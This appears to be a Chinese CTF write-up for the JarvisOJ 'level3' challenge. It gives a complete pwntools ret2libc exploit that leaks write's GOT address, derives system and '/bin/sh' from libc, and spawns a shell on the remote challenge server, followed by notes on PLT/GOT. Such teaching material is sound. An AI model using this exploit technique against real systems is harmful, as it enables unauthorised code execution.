思路:标准的 ret2libc,先通过 rop 控制 puts 出某个 GOT 中的地址以找到 libc 的基址,有了 libc 的基地址后,libc 中的所有函数和字符串的地址就知道了,构造一个 system(“/bin/sh”) 的函数调用栈即可
from pwn import *
#conn=process(’./level3’)
conn=remote(“pwn2.jarvisoj.com”,“9879”)
libc=ELF(’./libc-2.19.so’)
e=ELF(’./level3’)
pad=0x88+0x4 #buf长度为0x88 + 偏移地址0x4
vulfun_addr=0x0804844B #子程序位置
write_plt=e.symbols[‘write’] #获取write函数地址
write_got=e.got[‘write’] #获取write got表中地址
payload1=‘A’*pad+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4)
#覆盖前面的空间和ebp,然后执行write函数,设write函数的返回地址为vulnerable函数,然后给write函数传入三个参数(1,write的地址,4)
conn.recvuntil(“Input:\n”)
#接受"input:\n"
conn.sendline(payload1)
#传入payload
write_addr=u32(conn.recv(4))
##获得泄露的write()的地址,拦截前4个字节;
#calculate the system_address in memory
libc_write=libc.symbols[‘write’] #获取.so文件中write地址
libc_system=libc.symbols[‘system’]#获取.so文件中system地址
libc_sh=libc.search(’/bin/sh’).next()
#在.so文件搜索/bin/sh 地址
system_addr=write_addr-libc_write+libc_system
sh_addr=write_addr-libc_write+libc_sh
payload2=‘A’*pad+“BBBB”+p32(system_addr)+“dead”+p32(sh_addr)
#system初始地址,传入初始化值,值为4个字符,在传入/bin/sh地址.
conn.sendline(payload2)
conn.interactive()
通过获得有GOT/PLT表项的函数write()的真实地址以及.so文件中的write()和system函数和"/bin/sh",字符串偏移量与程序运行时三者的运行时(真实)地址偏移量相同的关系,通过write()的真实地址+相等偏移量获得system函数的调用地址和"/bin/sh" 字符串的地址.
write()在32位下传值为 write(1,write_got,4);
write()在64位下传值为 write(1,write_got,8);
fd: 文件描述符[1表示写到标准输出,即屏幕]
buf: 指定的缓冲区,即指针,指向一段内存单元;
nbyte: 要写入文件指定的字节数;
返回值: 写入文档的字节数(成功),-1(出错);
当写到nbyte的字节限制时,就write()结束了.
程序中为plt表,.so文件中为got表, plt表中存放的是函数在got表中该项的地址,got表存放的是函数在内存中真实地址, plt[write]指向got[write], got[write]指向write函数在内存中地址.
plt表在服务器和客户机是一样的,不一样的是函数在内存中的地址.程序运行后加载动态库,把动态库中相应的函数地址填入GOT表.
libc文件中不同函数,数据之间的偏移量是一样的.